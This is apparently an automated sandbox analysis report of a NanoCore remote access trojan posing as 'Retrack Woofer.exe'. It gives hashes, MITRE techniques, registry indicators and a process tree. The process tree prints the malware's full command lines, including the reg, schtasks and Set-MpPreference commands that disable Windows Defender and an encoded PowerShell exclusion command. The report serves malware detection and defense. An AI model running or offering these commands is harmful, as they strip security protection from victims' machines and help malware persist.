nanocore | 8af4c53b8010c14e5a07c9f72ec0172588ef13d7aa04afa1332666732d95cb0f

Analysis

max time kernel
89s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
07-07-2024 12:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Retrack Woofer.exe
Size

804KB
MD5

ae3f1e9ec89b546f4542ab3b3df5f593
SHA1

578044dc221016ef0a09fef215f731170fbfe6cd
SHA256

8af4c53b8010c14e5a07c9f72ec0172588ef13d7aa04afa1332666732d95cb0f
SHA512

57ff387cd6a66e5fe312b0ce383f5423625d20e0f9d1ecdf78e52c729ff9d73feaaec4751450f152be313793fe8dc3d4c656be802e0f8f876d36e65564eeb2b3
SSDEEP

24576:06mTXNe2tyyucITeGvlC6g9joXzFqeECi:lmhrClF9DzzF8

Score

10^/10

nanocore evasion execution keylogger persistence spyware stealer trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Windows\Plugin.vbs	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 15 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

WScript.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	WScript.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Retrack Woofer.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation	Retrack Woofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

Processes:

Plugin (2).exeUpdateService.exeRetrack spoof.exe

pid process

3632 Plugin (2).exe
5072 UpdateService.exe
112 Retrack spoof.exe

pid	process
3632	Plugin (2).exe
5072	UpdateService.exe
112	Retrack spoof.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

UpdateService.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DDP Host = "C:\\Program Files (x86)\\DDP Host\\ddphost.exe"	UpdateService.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

UpdateService.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UpdateService.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UpdateService.exe

Drops file in Program Files directory 2 IoCs

Processes:

UpdateService.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\DDP Host\ddphost.exe	UpdateService.exe
File created	C:\Program Files (x86)\DDP Host\ddphost.exe	UpdateService.exe

Drops file in Windows directory 4 IoCs

Processes:

Retrack Woofer.exe

description	ioc	process
File created	C:\Windows\Plugin (2).exe	Retrack Woofer.exe
File created	C:\Windows\Plugin.vbs	Retrack Woofer.exe
File created	C:\Windows\UpdateService.exe	Retrack Woofer.exe
File created	C:\Windows\Retrack spoof.exe	Retrack Woofer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1060 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2060 112 WerFault.exe Retrack spoof.exe

pid	pid_target	process	target process
2060	112	WerFault.exe	Retrack spoof.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133648302634227806"	chrome.exe

Modifies registry class 1 IoCs

Processes:

Retrack Woofer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings Retrack Woofer.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

4232 schtasks.exe
1704 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings	Retrack Woofer.exe

pid	process
4232	schtasks.exe
1704	schtasks.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdateService.exechrome.exe

pid	process
1060	powershell.exe
1060	powershell.exe
4208	powershell.exe
4208	powershell.exe
460	powershell.exe
1964	powershell.exe
1964	powershell.exe
460	powershell.exe
1540	powershell.exe
1540	powershell.exe
2804	powershell.exe
2804	powershell.exe
4984	powershell.exe
4984	powershell.exe
3524	powershell.exe
3524	powershell.exe
2416	powershell.exe
2416	powershell.exe
216	powershell.exe
216	powershell.exe
4412	powershell.exe
4412	powershell.exe
1712	powershell.exe
1712	powershell.exe
4208	powershell.exe
4208	powershell.exe
460	powershell.exe
460	powershell.exe
1964	powershell.exe
1964	powershell.exe
1540	powershell.exe
2804	powershell.exe
4984	powershell.exe
2416	powershell.exe
3524	powershell.exe
1712	powershell.exe
4412	powershell.exe
216	powershell.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe
5072	UpdateService.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

UpdateService.exe

pid process

5072 UpdateService.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

2244 chrome.exe
2244 chrome.exe
2244 chrome.exe
2244 chrome.exe
2244 chrome.exe
2244 chrome.exe
2244 chrome.exe

pid	process
5072	UpdateService.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdateService.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	460	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	5072	UpdateService.exe
Token: SeDebugPrivilege	5072	UpdateService.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe
Token: SeShutdownPrivilege	2244	chrome.exe
Token: SeCreatePagefilePrivilege	2244	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe
2244	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Retrack Woofer.exeWScript.exeWScript.exePlugin (2).execmd.exeUpdateService.exe

description	pid	process	target process
PID 3760 wrote to memory of 1060	3760	Retrack Woofer.exe	powershell.exe
PID 3760 wrote to memory of 1060	3760	Retrack Woofer.exe	powershell.exe
PID 3760 wrote to memory of 3632	3760	Retrack Woofer.exe	Plugin (2).exe
PID 3760 wrote to memory of 3632	3760	Retrack Woofer.exe	Plugin (2).exe
PID 3760 wrote to memory of 3632	3760	Retrack Woofer.exe	Plugin (2).exe
PID 3760 wrote to memory of 5008	3760	Retrack Woofer.exe	reg.exe
PID 3760 wrote to memory of 5008	3760	Retrack Woofer.exe	reg.exe
PID 3760 wrote to memory of 5072	3760	Retrack Woofer.exe	UpdateService.exe
PID 3760 wrote to memory of 5072	3760	Retrack Woofer.exe	UpdateService.exe
PID 3760 wrote to memory of 5072	3760	Retrack Woofer.exe	UpdateService.exe
PID 3760 wrote to memory of 112	3760	Retrack Woofer.exe	Retrack spoof.exe
PID 3760 wrote to memory of 112	3760	Retrack Woofer.exe	Retrack spoof.exe
PID 3760 wrote to memory of 112	3760	Retrack Woofer.exe	Retrack spoof.exe
PID 5008 wrote to memory of 844	5008	WScript.exe	WScript.exe
PID 5008 wrote to memory of 844	5008	WScript.exe	WScript.exe
PID 844 wrote to memory of 4208	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 4208	844	WScript.exe	powershell.exe
PID 3632 wrote to memory of 652	3632	Plugin (2).exe	cmd.exe
PID 3632 wrote to memory of 652	3632	Plugin (2).exe	cmd.exe
PID 844 wrote to memory of 1964	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 1964	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 460	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 460	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 2804	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 2804	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 1540	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 1540	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 4984	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 4984	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 3524	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 3524	844	WScript.exe	powershell.exe
PID 652 wrote to memory of 4888	652	cmd.exe	reg.exe
PID 652 wrote to memory of 4888	652	cmd.exe	reg.exe
PID 844 wrote to memory of 4412	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 4412	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 1712	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 1712	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 2416	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 2416	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 216	844	WScript.exe	powershell.exe
PID 844 wrote to memory of 216	844	WScript.exe	powershell.exe
PID 652 wrote to memory of 2592	652	cmd.exe	WerFault.exe
PID 652 wrote to memory of 2592	652	cmd.exe	WerFault.exe
PID 652 wrote to memory of 3096	652	cmd.exe	reg.exe
PID 652 wrote to memory of 3096	652	cmd.exe	reg.exe
PID 652 wrote to memory of 2052	652	cmd.exe	reg.exe
PID 652 wrote to memory of 2052	652	cmd.exe	reg.exe
PID 5072 wrote to memory of 4232	5072	UpdateService.exe	schtasks.exe
PID 5072 wrote to memory of 4232	5072	UpdateService.exe	schtasks.exe
PID 5072 wrote to memory of 4232	5072	UpdateService.exe	schtasks.exe
PID 652 wrote to memory of 2716	652	cmd.exe	reg.exe
PID 652 wrote to memory of 2716	652	cmd.exe	reg.exe
PID 652 wrote to memory of 4964	652	cmd.exe	reg.exe
PID 652 wrote to memory of 4964	652	cmd.exe	reg.exe
PID 652 wrote to memory of 2060	652	cmd.exe	WerFault.exe
PID 652 wrote to memory of 2060	652	cmd.exe	WerFault.exe
PID 652 wrote to memory of 5048	652	cmd.exe	reg.exe
PID 652 wrote to memory of 5048	652	cmd.exe	reg.exe
PID 652 wrote to memory of 988	652	cmd.exe	reg.exe
PID 652 wrote to memory of 988	652	cmd.exe	reg.exe
PID 5072 wrote to memory of 1704	5072	UpdateService.exe	schtasks.exe
PID 5072 wrote to memory of 1704	5072	UpdateService.exe	schtasks.exe
PID 5072 wrote to memory of 1704	5072	UpdateService.exe	schtasks.exe
PID 652 wrote to memory of 3544	652	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe
"C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAcABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcwBmACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Windows\Plugin (2).exe
"C:\Windows\Plugin (2).exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EA50.tmp\EA61.tmp\EA62.bat "C:\Windows\Plugin (2).exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4888

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:2592

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:3096

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:2052

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2716

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4964

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2060

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5048

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:988

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:3544

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:1952

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:3964

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:3268

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:5008

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1612

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:2196

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:2268

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:2464

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:2272

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:3740

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:3032

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:964

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2292

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4676

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4600

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1216

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2200

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4612

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2660

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5008

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs" /elevate
3⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\UpdateService.exe
"C:\Windows\UpdateService.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
